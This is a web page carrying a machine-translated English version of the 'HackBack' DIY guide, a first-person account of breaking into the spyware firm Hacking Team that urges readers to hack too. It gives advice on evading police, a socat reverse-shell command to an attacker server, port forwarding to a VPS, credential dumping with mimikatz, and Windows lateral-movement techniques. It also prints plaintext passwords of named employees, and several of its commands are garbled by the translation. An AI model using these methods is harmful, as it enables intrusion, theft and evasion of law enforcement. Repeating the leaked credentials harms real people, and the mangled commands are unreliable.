ht_exploitation_en.html 45 KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321331341351361371381391401411421431441451461471481491501511521531541551561571581591601611621631641651661671681691701711721731741751761771781791801811821831841851861871881891901911921931941951961971981992002012022032042052062072082092102112122132142152162172182192202212222232242252262272282292302312322332342352362372382392402412422432442452462472482492502512522532542552562572582592602612622632642652662672682692702712722732742752762772782792802812822832842852862872882892902912922932942952962972982993003013023033043053063073083093103113123133143153163173183193203213223233243253263273283293303313323333343353363373383393403413423433443453463473483493503513523533543553563573583593603613623633643653663673683693703713723733743753763773783793803813823833843853863873883893903913923933943953963973983994004014024034044054064074084094104114124134144154164174184194204214224234244254264274284294304314324334344354364374384394404414424434444454464474484494504514524534544554564574584594604614624634644654664674684694704714724734744754764774784794804814824834844854864874884894904914924934944954964974984995005015025035045055065075085095105115125135145155165175185195205215225235245255265275285295305315325335345355365375385395405415425435445455465475485495505515525535545555565575585595605615625635645655665675685695705715725735745755765775785795805815825835845855865875885895905915925935945955965975985996006016026036046056066076086096106116126136146156166176186196206216226236246256266276286296306316326336346356366376386396406416426436446456466476486496506516526536546556566576586596606616626636646656666676686696706716726736746756766776786796806816826836846856866876886896906916926936946956966976986997007017027037047057067077087097107117127137147157167177187197207217227237247257267277287297307317327337347357367377387397407417427437447457467477487497507517527537547557567577587597607617627637647657667677687697707717727737747757767777787797807817827837847857867877887897907917927937947957967977987998008018028038048058068078088098108118128138148158168178188198208218228238248258268278288298308318328338348358368378388398408418428438448458468478488498508518528538548558568578588598608618628638648658668678688698708718728738748758768778788798808818828838848858868878888898908918928938948958968978988999009019029039049059069079089099109119129139149159169179189199209219229239249259269279289299309319329339349359369379389399409419429439449459469479489499509519529539549559569579589599609619629639649659669679689699709719729739749759769779789799809819829839849859869879889899909919929939949959969979989991000100110021003100410051006100710081009101010111012101310141015101610171018101910201021102210231024102510261027102810291030103110321033103410351036103710381039104010411042104310441045104610471048104910501051105210531054105510561057105810591060106110621063106410651066106710681069
  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4. <meta charset="utf-8">
  5. <title>Polybius Hacklab</title>
  6. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  7. <meta name="description" content="open source, hacklab, linux, libertarian, free, open, gpl">
  8. <meta name="author" content="">
  9. <!-- Le styles -->
  10. <link href="css/bootstrap.css" rel="stylesheet">
  11. <style type="text/css">
  12. body {
  13. padding-top: 60px;
  14. padding-bottom: 40px;
  15. }
  16. </style>
  17. <link href="css/bootstrap-responsive.css" rel="stylesheet">
  18. <!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
  19. <!--[if lt IE 9]>
  20. <script src="js/html5shiv.js"></script>
  21. <![endif]-->
  22. <!-- Fav and touch icons -->
  23. <link rel="apple-touch-icon-precomposed" sizes="144x144" href="ico/apple-touch-icon-144-precomposed.png">
  24. <link rel="apple-touch-icon-precomposed" sizes="114x114" href="ico/apple-touch-icon-114-precomposed.png">
  25. <link rel="apple-touch-icon-precomposed" sizes="72x72" href="ico/apple-touch-icon-72-precomposed.png">
  26. <link rel="apple-touch-icon-precomposed" href="ico/apple-touch-icon-57-precomposed.png">
  27. <link rel="shortcut icon" href="ico/favicon.png">
  28. </head>
  29. <body>
  30. <div class="navbar navbar-inverse navbar-fixed-top">
  31. <div class="navbar-inner">
  32. <div class="container">
  33. <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
  34. <span class="icon-bar"></span>
  35. <span class="icon-bar"></span>
  36. <span class="icon-bar"></span>
  37. </button>
  38. <a class="brand" href="#">Polybius</a>
  39. <div class="nav-collapse collapse">
  40. <ul class="nav">
  41. <li><a href="index.html">Home</a></li>
  42. <li class="active"><a href="#">About</a></li>
  43. <!--li><a href="#about">About</a></li>
  44. <li><a href="#contact">Contact</a></li>
  45. <li class="dropdown">
  46. <a href="#" class="dropdown-toggle" data-toggle="dropdown">Dropdown <b class="caret"></b></a>
  47. <ul class="dropdown-menu">
  48. <li><a href="#">Action</a></li>
  49. <li><a href="#">Another action</a></li>
  50. <li><a href="#">Something else here</a></li>
  51. <li class="divider"></li>
  52. <li class="nav-header">Nav header</li>
  53. <li><a href="#">Separated link</a></li>
  54. <li><a href="#">One more separated link</a></li>
  55. </ul>
  56. </li-->
  57. </ul>
  58. <!--form class="navbar-form pull-right">
  59. <input class="span2" type="text" placeholder="Email">
  60. <input class="span2" type="password" placeholder="Password">
  61. <button type="submit" class="btn">Sign in</button>
  62. </form-->
  63. </div><!--/.nav-collapse -->
  64. </div>
  65. </div>
  66. </div>
  67. <div class="container">
  68. <!-- Example row of columns -->
  69. <div class="row">
  70. <div class="span11">
  71. <h1>{en} HackBack pissing on Hacking Team</h1>
  72. <p><pre><code>
  73. _ _ _ ____ _ _
  74. | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
  75. | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
  76. | _ | (_| | (__| < | |_) | (_| | (__| <|_|
  77. |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
  78. A DIY Guide
  79. ,-._,-._
  80. _,-\ o O_/;
  81. / , ` `|
  82. | \-.,___, / `
  83. \ `-.__/ / ,.\
  84. / `-.__.-\` ./ \'
  85. / /| ___\ ,/ `\
  86. ( ( |.-"` '/\ \ `
  87. \ \/ ,, | \ _
  88. \| o/o / \.
  89. \ , / /
  90. ( __`;-;'__`) \\
  91. `//'` `||` `\
  92. _// || __ _ _ _____ __
  93. .-"-._,(__) .(__).-""-. | | | | |_ _| |
  94. / \ / \ | | |_| | | | |
  95. \ / \ / | | _ | | | |
  96. `'-------` `--------'` __| |_| |_| |_| |__
  97. #antisec
  98. - [1 - Introduction] ------------------------------------------- ----------------
  99. You'll notice the language change since the last edition [1]. Speaking world
  100. English already has books, lectures, guides, and information about spare
  101. hacking. In this world there are many better I hackers, but unfortunately
  102. They squander their knowledge working for contractors "defense"
  103. for intelligence agencies to protect the banks and corporations and
  104. to defend the established order. The hacker culture was born in the US as a
  105. counterculture, but that source has remained in mere aesthetics - the rest has
  106. It has been assimilated. At least they can wear a shirt, dye her hair blue,
  107. hackers use their nicknames, and feel rebels while working for the
  108. system.
  109. Before someone had to sneak into the offices to filter documents [2].
  110. a gun to rob a bank was needed. Today you can do it from
  111. bed with a laptop in hands [3] [4]. As the CNT said after the
  112. Gamma hack Group: "we try to take another step forward with new
  113. forms of struggle "[5]. The hack is a powerful tool, let us learn and
  114. let's fight!
  115. [1] http://pastebin.com/raw.php?i=cRYvK4jb
  116. [2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
  117. [3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
  118. [4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
  119. [5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group
  120. - [2 - Hacking Team] ------------------------------------------ ----------------
  121. Hacking Team was a company that helped governments to hack and spy on
  122. journalists, activists, political opponents, and other threats to their power
  123. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]. And, very occasionally, criminals and
  124. terrorists [12]. A Vincenzetti, CEO, liked to finish his post with
  125. the fascist slogan "boia chi molla". It would be more successful "boia RCS sells chi".
  126. They also claimed to have technology to solve the "problem" of Tor and
  127. darknet [13]. But seeing that I still have my freedom, I have my doubts about
  128. their effectiveness.
  129. [1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
  130. [2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
  131. [3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
  132. [4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
  133. [5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
  134. [6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
  135. [7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
  136. [8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
  137. [9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
  138. [10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
  139. [11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
  140. [12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
  141. [13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web
  142. Unfortunately, our world is upside down. Enriches you do bad things
  143. and imprisons you do good things. Fortunately, thanks to the work
  144. hard for people such as "Tor project" [1], you can keep you from getting into the
  145. jail by a few simple guidelines:
  146. 1) Encrypt your hard drive [2]
  147. I guess when the police arrive to impound your computer,
  148. mean you've already made many mistakes, but better safe
  149. than cure.
  150. 2) Use a virtual machine and all traffic routed by Tor
  151. This accomplishes two things. First, that all connections are anonymized to
  152. through the Tor network. Second, keep personal life and anonymous life
  153. on different computers it helps you not to mix by accident.
  154. You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or something
  155. personalized [6]. Here [7] there is a detailed comparison.
  156. 3) (Optional) Do not connect directly to the Tor network
  157. Tor is not the panacea. You can correlate the hours that you are connected
  158. Tor with the hours that your nickname is active hacker. There have also been
  159. successful attacks against the network [8]. You can connect to the Tor network through
  160. wifi others. Wifislax [9] is a Linux distribution with many
  161. tools to get wifi. Another option is to connect to a VPN or
  162. bridge node [10] before Tor, but is less secure because it still is
  163. They may correlate with hacker activity internet activity
  164. your home (this example was used as evidence against Jeremy Hammond
  165. [eleven]).
  166. The reality is that even though Tor is not perfect, it works quite well.
  167. When I was young and reckless, did many things without any protection (me
  168. referring to hacking) other than Tor, police made it impossible
  169. investigate, and I've never had problems.
  170. [1] https://www.torproject.org/
  171. [2] https://info.securityinabox.org/es/chapter-4
  172. [3] https://www.whonix.org/
  173. [4] https://tails.boum.org/
  174. [5] https://www.qubes-os.org/doc/privacy/torvm/
  175. [6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
  176. [7] https://www.whonix.org/wiki/Comparison_with_Others
  177. [8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
  178. [9] http://www.wifislax.com/
  179. [10] https://www.torproject.org/docs/bridges.html.en
  180. [eleven] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html
  181. ---- [3.1 - Infrastructure] ----------------------------------------- ----------
  182. No hacking directly with output relays Tor. They are blacklisted,
  183. They are very slow, and you can not receive reverse connections. Tor serves to
  184. protect my anonymity while I connect to the infrastructure used for
  185. hack, which consists of:
  186. 1) Domain Names
  187. Addresses used for command and control (C & C), and for tunnels
  188. DNS for insured egress.
  189. 2) Stable Servers
  190. It serves to C & C servers to receive reverse shells, to launch
  191. attacks and keep the loot.
  192. 3) Servers Hacked
  193. They serve as pivots to hide the IP of stable servers, and
  194. when I want a quick connection without pivot. For example scan ports,
  195. scan the whole internet, download a database with SQL injection,
  196. etc.
  197. Obviously you have to pay anonymously, as bitcoin (if you use it with
  198. watch out).
  199. ---- [3.2 - Allocation] ----------------------------------------- ---------------
  200. Often in the news that have attributed an attack on a group of
  201. governmental hackers (the "APTs"), because they always use the same
  202. tools, leaving the same fingerprints, and even use the same
  203. infrastructure (domains, mail etc). They neglect because they can hack
  204. without legal consequences.
  205. I did not want to make it easier for police work and relate what Hacking
  206. Team with hacks and nicknames of my daily work as a hacker glove
  207. black. So I used new servers and domains registered with new post
  208. and paid with new bitcoin address. In addition, only I used tools
  209. public and things that I wrote especially for this attack and changed my way
  210. to do some things to keep my normal forensic trace.
  211. - [4 - Gathering Information] ------------------------------------------ ---------
  212. Although it can be tedious, this stage is very important, because the more
  213. larger the attack surface, the easier it will be to find a fault in a
  214. portion thereof.
  215. ---- [4.1 - Technical Information] ---------------------------------------- -------
  216. Some tools and techniques are:
  217. 1) Google
  218. You can find many unexpected things with a couple of good searches
  219. picked. For example, the identity of DPR [1]. The bible of how to use
  220. google to hack is the book "Google Hacking for Penetration Testers".
  221. You can also find a brief summary in Spanish in [2].
  222. 2) Enumeration of subdomains
  223. Often the primary domain of a company is hosted by a third party, and
  224. you are getting the IP ranges of the company thanks to subdomains as
  225. mx.company.com, ns1.company.com etc. Also, sometimes there are things that should not be
  226. be exposed to "hidden" subdomains. Useful tools for
  227. discover domains and subdomains are fierce [3], theHarvester [4] and
  228. recon-ng [5].
  229. 3) reverse lookups and searches whois
  230. With a reverse search using the whois information of a domain or range
  231. IPs of a company, you can find others of their domains and ranges
  232. IPs. To my knowledge, there is no free way to do reverse lookups
  233. whois, apart from a "hack" with google:
  234. "Via della Moscova 13" site: www.findip-address.com
  235. "Via della Moscova 13" site: domaintools.com
  236. 4) Port scanning and fingerprinting
  237. Unlike other techniques, this speaks servers
  238. company. I include in this section because it is not an attack, it is only for
  239. gather information. The company IDS can generate an alert to
  240. scan ports, but you do not have to worry because all internet
  241. it is constantly being scanned.
  242. To scan, nmap [6] necessary, and can fingerprint most
  243. services discovered. For companies with very long ranges of IPs,
  244. ZMap [7] or masscan [8] are fast. WhatWeb [9] or BlindElephant [10]
  245. You can fingerprint websites.
  246. [1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
  247. [2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
  248. [3] http://ha.ckers.org/fierce/
  249. [4] https://github.com/laramies/theHarvester
  250. [5] https://bitbucket.org/LaNMaSteR53/recon-ng
  251. [6] https://nmap.org/
  252. [7] https://zmap.io/
  253. [8] https://github.com/robertdavidgraham/masscan
  254. [9] http://www.morningstarsecurity.com/research/whatweb
  255. [10] http://blindelephant.sourceforge.net/
  256. ---- [4.2 - Social Information] ---------------------------------------- --------
  257. For social engineering, it is very useful to collect information about
  258. employees, their roles, contact information, operating system, browser,
  259. plugins, software, etc. Some resources are:
  260. 1) Google
  261. Here too, it is the most useful tool.
  262. 2) theHarvester and recon-ng
  263. I have already mentioned in the previous section, but have much more
  264. functionality. You can find a lot of information quickly and
  265. automated. Worth reading all documentation.
  266. 3) LinkedIn
  267. You can find much information about the employees here. The
  268. Company recruiters are more likely to accept your requests.
  269. 4) Data.com
  270. Formerly known as jigsaw. You have the contact information of many
  271. employees.
  272. 5) Metadata file
  273. You can find lots of information about employees and their systems
  274. metadata files that the company has published. helpful Tools
  275. to find files on the website of the company and extract
  276. Metadata is metagoofil [1] and FOCA [2].
  277. [1] https://github.com/laramies/metagoofil
  278. [2] https://www.elevenpaths.com/es/labstools/foca-2/index.html
  279. - [5 - Entering the Network] ---------------------------------------- ------------
  280. There are several ways to make entry. Since the method I used for hacking
  281. team is rare and much more work than is usually necessary,
  282. I'll talk a bit about the two most common methods, I recommend trying
  283. First.
  284. ---- [5.1 - Social Engineering] ---------------------------------------- ---------
  285. social engineering, spear phishing specifically, is responsible for the
  286. Most hacking today. For an introduction in Spanish, see [1].
  287. For more information in English, see [2] (the third part, "Targeted
  288. Attacks "). For social engineering amusing anecdotes generations
  289. past, see [3]. I did not want to try spear phishing against Hacking Team,
  290. because your business is to help governments to spear phish their opponents.
  291. Therefore there is a much higher risk that recognize and Hacking Team
  292. investigate this attempt.
  293. [1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
  294. [2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
  295. [3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf
  296. ---- [5.2 - Buy Access] ---------------------------------------- ------------
  297. Thanks to painstaking Russians and their exploit kits, smugglers trafficking, and
  298. bot herders, many companies already have compromised computers within
  299. their networks. Almost all Fortune 500, with their huge networks have a
  300. bots already inside. However, Hacking Team is a very small company, and
  301. Most employees are experts in computer security, then there was
  302. little chance that were already committed.
  303. ---- [5.3 - Technical Operations] ---------------------------------------- -------
  304. After hacking Gamma Group, I described a process to search
  305. vulnerabilities [1]. Hacking Team has a range of public IP:
  306. inetnum: 93.62.139.32 - 93.62.139.47
  307. descr: HT public subnet
  308. Hacking Team had very little exposed to the internet. For example, different
  309. Gamma Group, your site customer needs a certificate
  310. client to connect. What he had was his main website (a blog Joomla
  311. that Joomscan [2] reveals no serious failure), a server post a
  312. pair of routers, two VPN devices, and a device for filtering spam.
  313. Then I had three options: find a 0day in Joomla, find a 0day in
  314. postfix, or find a 0day in one of the embedded systems. A 0day a
  315. embedded system seemed the most attainable option, and after two weeks
  316. reverse engineering work, I got a remote root exploit. Given the
  317. vulnerabilities have not yet been patched, I will not give more details.
  318. For more information on how to find these vulnerabilities, see
  319. [3] and [4].
  320. [1] http://pastebin.com/raw.php?i=cRYvK4jb
  321. [2] http://sourceforge.net/projects/joomscan/
  322. [3] http://www.devttys0.com/
  323. [4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A
  324. - [6 - Be Prepared] ------------------------------------------ -------------
  325. I did a lot of work and testing before using the exploit against Hacking Team.
  326. I wrote a backdoor firmware, and compiled several tools
  327. post-exploitation for embedded system. The backdoor serves to protect the
  328. exploit. Use the exploit only once and then return by the backdoor ago
  329. work harder to find and patch vulnerabilities.
  330. The post-exploitation tools he had prepared were:
  331. 1) busybox
  332. For all common UNIX utilities that the system did not.
  333. 2) nmap
  334. To scan and fingerprint the internal network of Hacking Team.
  335. 3) Responder.py
  336. The most useful tool to attack Windows networks when you have access to
  337. the internal network but do not have a domain user.
  338. 4) Python
  339. To run Responder.py
  340. 5) tcpdump
  341. To snoop traffic.
  342. 6) dsniff
  343. Weak passwords to spy protocols such as ftp, and to make
  344. ARP spoofing. I wanted to use ettercap, written by the same ALOR and naga
  345. Hacking Team, but it was difficult to compile for the system.
  346. 7) socat
  347. For a comfortable shell with pty:
  348. my_server: socat file: `tty`, raw, echo = 0 tcp-listen: mi_puerto
  349. Hacked system: socat exec: 'bash -li' pty, stderr, setsid, SIGINT, heal \
  350. tcp: my_server: I mi_puerto
  351. And for many other things, it is a Swiss Army knife of networking. See section
  352. Examples of documentation.
  353. 8) screen
  354. As socat pty is not strictly necessary, but I wanted to feel
  355. at home in networks Hacking Team.
  356. 9) a SOCKS proxy server
  357. To use with proxychains to access the internal network with any
  358. another program.
  359. 10) tgcd
  360. To forward ports, as SOCKS server through the firewall.
  361. [1] https://www.busybox.net/
  362. [2] https://nmap.org/
  363. [3] https://github.com/SpiderLabs/Responder
  364. [4] https://github.com/bendmorris/static-python
  365. [5] http://www.tcpdump.org/
  366. [6] http://www.monkey.org/~dugsong/dsniff/
  367. [7] http://www.dest-unreach.org/socat/
  368. [8] https://www.gnu.org/software/screen/
  369. [9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
  370. [10] http://tgcd.sourceforge.net/
  371. The worst that could happen was that my backdoor or post-exploitation tools
  372. dejasen unstable the system and make an employee to investigate. By
  373. So I spent a week trying my exploit, backdoor, and tools
  374. post-operation over networks of other vulnerable companies before entering
  375. Network Hacking Team.
  376. - [7 - Look and Listen] ----------------------------------------- ----------
  377. Now within the internal network, I want to take a look and think before giving
  378. the next step. I turn Responder.py in analysis mode (-A, to listen without
  379. Poisoned answers), and make a slow scan with nmap.
  380. - [8 - NoSQL databases] ---------------------------------------- ----------
  381. NoSQL, or rather NoAutenticación has been a great gift to the community
  382. hacker [1]. When I worry that they have finally patched all failures
  383. Authentication Bypass in MySQL [2] [3] [4] [5] put new fashion base
  384. Data unauthenticated by design. Nmap is a few on the net
  385. Internal Hacking Team:
  386. 27017 / tcp open MongoDB MongoDB 2.6.5
  387. | mongodb-databases:
  388. | ok = 1
  389. | totalSizeMb = 47547
  390. | totalSize = 49856643072
  391. ...
  392. | _ Version = 2.6.5
  393. 27017 / tcp open MongoDB MongoDB 2.6.5
  394. | mongodb-databases:
  395. | ok = 1
  396. | totalSizeMb = 31987
  397. | totalSize = 33540800512
  398. | DATABASES
  399. ...
  400. | _ Version = 2.6.5
  401. Were the databases for RCS test instances. The audio recording
  402. RCS is stored in MongoDB with GridFS. The audio folder on torrent [6]
  403. It comes from this. Unwittingly they spied on themselves.
  404. [1] https://www.shodan.io/search?query=product%3Amongodb
  405. [2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
  406. [3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
  407. [4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
  408. [5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
  409. [6] https://ht.transparencytoolkit.org/audio/
  410. - [9 - Cables Cruzados] ------------------------------------------ -------------
  411. Although it was fun to listen to recordings and view images Hacking webcam
  412. Team developing its malware was not very useful. Unsteady copies of
  413. security vulnerability were opened. according to his
  414. documentation [1], its iSCSI devices must be on a separate network,
  415. but nmap find some in your 192.168.1.200/24 ​​subnet:
  416. Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
  417. ...
  418. 3260 / tcp open iscsi?
  419. | iscsi-info:
  420. | Target: iqn.2000-01.com.synology: ht-synology.name
  421. | Address: 192.168.200.66:3260,0
  422. | _ Authentication: No authentication required
  423. Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
  424. ...
  425. 3260 / tcp open iscsi?
  426. | iscsi-info:
  427. | Target: iqn.2000-01.com.synology: synology-backup.name
  428. | Address: 10.0.1.72:3260,0
  429. | Address: 192.168.200.72:3260,0
  430. | _ Authentication: No authentication required
  431. iSCSI requires a kernel module, and compile it would have been difficult for the
  432. embedded system. I forwarded the port to mount from a VPS:
  433. VPS: tgcd -L -p 3260 -q 42838
  434. Embedded system: tgcd -C -s -c 192.168.200.72:3260 VPS_IP: 42838
  435. VPS: iscsiadm discovery -m -p -t 127.0.0.1 SendTargets
  436. Now you find the name iqn.2000-01.com.synology iSCSI but has problems
  437. when mounting because he believes his address is 192.168.200.72 instead of
  438. 127.0.0.1
  439. The way I solved was:
  440. iptables -t nat -A OUTPUT -d -j 192.168.200.72 DNAT --to-destination 127.0.0.1
  441. And now after:
  442. -m node iscsiadm --targetname = iqn.2000-01.com.synology: 192.168.200.72 -p synology-backup.name --login
  443. ... The device file appears! We ride:
  444. vmfs-fuse -o ro / dev / sdb1 / mnt / tmp
  445. and we find backups of multiple virtual machines. The server
  446. Exchange seems most interesting. It is too large to download,
  447. but we can mount remote and look for interesting files:
  448. $ Losetup / dev / loop0 Exchange.hackingteam.com-flat.vmdk
  449. $ Fdisk -l / dev / loop0
  450. / Dev / loop0p1 2048 1258287103 629142528 7 HPFS / NTFS / exFAT
  451. then the offset is 2048 * 512 = 1048576
  452. 1048576 $ losetup -o / dev / loop1 / dev / loop0
  453. $ Mount -o ro / dev / loop1 / mnt / exchange /
  454. now in / mnt / exchange / WindowsImageBackup / EXCHANGE / Backup 172311 10/14/2014
  455. We find the hard drive of the virtual machine, and assemble:
  456. vdfuse -r -t -f VHD f0f78089-D28a-11e2-a92c-005056996a44.vhd / mnt / vhd-disk /
  457. mount -o loop / mnt / vhd-disk / Partition1 / mnt / part1
  458. ... And finally we unpacked the doll and we can see all
  459. the old Exchange server files in / mnt / part1
  460. [1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf
  461. - [10 - Backup to Domain Administrator] ---------------------
  462. What interests me most about the backup is to look if you have a
  463. or hash password you can use to access the current server. Use pwdump,
  464. cachedump, and lsadump [1] with the registry files. lsadump is the
  465. password account besadmin service:
  466. _SC_BlackBerry MDS Connection Service
  467. 0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
  468. 0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
  469. 0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00!.!.! ...........
  470. proxychains [2] use the SOCKS server and embedded system
  471. smbclient [3] to check the password:
  472. proxychains smbclient //192.168.100.51/c$ '-U' hackingteam.local / besadmin% bes32678 !!! '
  473. !Works! Besadmin password is still valid, and is an administrator
  474. local. I use my proxy and psexec_psh metasploit [4] for a session
  475. of meterpreter. Then I migrate to a 64-bit process, "load kiwi" [5]
  476. "Creds_wdigest", and I have many passwords, including the Administrator
  477. domain:
  478. HACKINGTEAM BESAdmin bes32678 !!!
  479. HACKINGTEAM Administrator uu8dd8ndd12!
  480. HACKINGTEAM c.pozzi P4ssword <---- sysadmin go!
  481. M.romeo HACKINGTEAM ioLK / (90
  482. L.guerra HACKINGTEAM 4luc@=.=
  483. HACKINGTEAM D.Martinez W4tudul3sp
  484. HACKINGTEAM g.russo GCBr0s0705!
  485. A.scarafile HACKINGTEAM Cd4432996111
  486. HACKINGTEAM r.viscardi Ht2015!
  487. HACKINGTEAM a.mino A! E $$ andra
  488. HACKINGTEAM m.bettini Ettore & Bella0314
  489. M.luppi HACKINGTEAM Blackou7
  490. HACKINGTEAM s.gallucci 1S9i8m4o!
  491. HACKINGTEAM d.milan set! Dob66
  492. HACKINGTEAM w.furlan Blu3.B3rry!
  493. HACKINGTEAM d.romualdi Rd13136f @ #
  494. HACKINGTEAM l.invernizzi L0r3nz0123!
  495. HACKINGTEAM e.ciceri 2O2571 & 2E
  496. HACKINGTEAM e.rabe erab @ 4HT!
  497. [1] https://github.com/Neohapsis/creddump7
  498. [2] http://proxychains.sourceforge.net/
  499. [3] https://www.samba.org/
  500. [4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
  501. [5] https://github.com/gentilkiwi/mimikatz
  502. - [11 - Downloading Post] ----------------------------------------- ------
  503. Now that I have the password for the domain administrator, I have access to
  504. mails, the heart of the company. Because with every step I take is a
  505. risk of detection, I download mails before further exploring.
  506. Powershell makes it easy [1]. Interestingly, I found a bug with handling
  507. dates. After getting the mail, I took a couple of weeks in
  508. get the source and other code, so I returned occasionally to
  509. download new emails. The server was Italian, with the dates
  510. day / month / year. Use:
  511. -ContentFilter {(Received -ge '05 / 06/2015 ') -or (Sent -ge '05 / 06/2015')}
  512. with the New-MailboxExportRequest to download new mail (in this
  513. If all mail from June 5. The problem is that says
  514. the date is invalid if the day is greater than 12 (I guess this is because
  515. US that is the first month and month can not be greater than 12). Looks like
  516. Microsoft engineers have only tested their software with their own
  517. regional configuration.
  518. [1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/
  519. - [12 - Downloading Files] ------------------------------------------ -------
  520. Now I'm a domain administrator, I also began to download
  521. shares using my proxy and -Tc smbclient option for
  522. example:
  523. proxychains smbclient //192.168.1.230/FAE DiskStation '\
  524. -U 'HACKINGTEAM / Administrator% uu8dd8ndd12!' -TC FAE_DiskStation.tar '*'
  525. So I downloaded the Amministrazione, FAE DiskStation, and FileServer folders
  526. the torrent.
  527. - [13 - Introduction to Hacking Windows Domain] -----------------------
  528. Before continue telling the story of the Culiao Non-Windows, it should say something
  529. knowledge to attack Windows networks.
  530. ---- [13.1 - Lateral Movement] ---------------------------------------- -------
  531. I will give a brief overview of the techniques to spread within a network
  532. Windows. Techniques to run remotely require the password or
  533. hash of a local administrator on the target. By far the most common way
  534. to get such credentials is to use mimikatz [1], especially
  535. logonpasswords and sekurlsa sekurlsa :: :: mSv, on computers where you already have
  536. administrative access. Movement techniques "in situ" also Require
  537. administrative privileges (I except for runes). The more tools
  538. important privilege escalation are PowerUp [2], and bypassuac [3].
  539. [1] https://adsecurity.org/?page_id=1821
  540. [2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
  541. [3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1
  542. Remote movement:
  543. 1) psexec
  544. The basic and proven way of moving windows networks. You can use
  545. psexec [1], winexe [2], psexec_psh metasploit [3], invoke_psexec of
  546. powershell empire [4], or the Windows command "sc" [5]. For module
  547. metasploit, powershell empire, and pth-winexe [6], enough to know the hash
  548. without knowing the password. It is the most universal way (works on any
  549. computer with port 445 open), but also way less
  550. cautious. It appears in the 7045 event log type "Service
  551. Control Manager. "In my experience, they have never realized for a
  552. hack, but sometimes you notice later and helps researchers understand
  553. what has made the hacker.
  554. 2) WMI
  555. more cautious way. WMI service is enabled on all
  556. Windows computers, but except for servers, the firewall blocks it
  557. default. You can use wmiexec.py [7] pth-WMIS [6] (here's a
  558. wmiexec demonstration and pth-WMIS [8]), invoke_wmi empire powershell
  559. [9], or the Windows command wmic [5]. All but need only wmic
  560. hash.
  561. 3) PSRemoting [10]
  562. It is disabled by default, and not advise enable new
  563. protocols that are not needed. But if the sysadmin already enabled,
  564. is very convenient, especially if you use powershell for all (and yes,
  565. you should use powershell for almost everything will change [11] with powershell 5
  566. and Windows 10, but now powershell day makes it easy to do everything in RAM,
  567. dodge antivirus, and leave few traces).
  568. 4) Scheduled Tasks
  569. You can run remote programs at and schtasks [5]. It works on the
  570. psexec same situations, and also leaves traces known [12].
  571. 5) GPO
  572. If all these protocols are disabled or blocked by
  573. firewall, once you are the domain administrator, you can use GPO
  574. to give a logon script, install a msi, run a scheduled task
  575. [13], or as we shall see computer Mauro Romeo (sysadmin Hacking
  576. Team), enable WMI and open the firewall via GPO.
